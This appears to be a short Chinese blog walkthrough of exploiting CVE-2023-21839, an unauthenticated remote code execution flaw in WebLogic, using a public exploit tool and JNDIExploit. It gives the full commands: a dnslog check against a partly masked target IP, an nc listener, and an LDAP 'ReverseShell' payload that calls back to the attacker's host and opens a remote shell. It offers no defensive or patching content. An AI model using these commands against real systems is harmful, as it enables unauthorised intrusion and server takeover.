CVE-2023-21839 Weblogic未授权RCE

https://github.com/4ra1n/CVE-2023-21839下载之后
在这里插入图片描述
生成CVE-2023-21389.exe
先试试dnslog:

CVE-2023-21839.exe -ip 116.xx.xx.xx -port 7001 -ldap ldap://whoami.eduvck.dnslog.cn/aa

CVE-2023-21839 Weblogic未授权RCE_第1张图片

然后使用JNDIExploit-1.4-SNAPSHOT.jar进行攻击
另一个终端上
首先开启监听

nc -lvp 5858

CVE-2023-21839 Weblogic未授权RCE_第2张图片
然后用JNDIExploit-1.4-SNAPSHOT.jar监听jndi端口
CVE-2023-21839 Weblogic未授权RCE_第3张图片

然后执行exp

CVE-2023-21839.exe -ip 116.xx.xx.xx -port 7001 -ldap ldap://47.xx.xx.xx:1389/Basic/ReverseShell/47.xx.xx.xx/5858

CVE-2023-21839 Weblogic未授权RCE_第4张图片
CVE-2023-21839 Weblogic未授权RCE_第5张图片
这样就成功弹回了shell

你可能感兴趣的:(CVE,web安全,网络安全)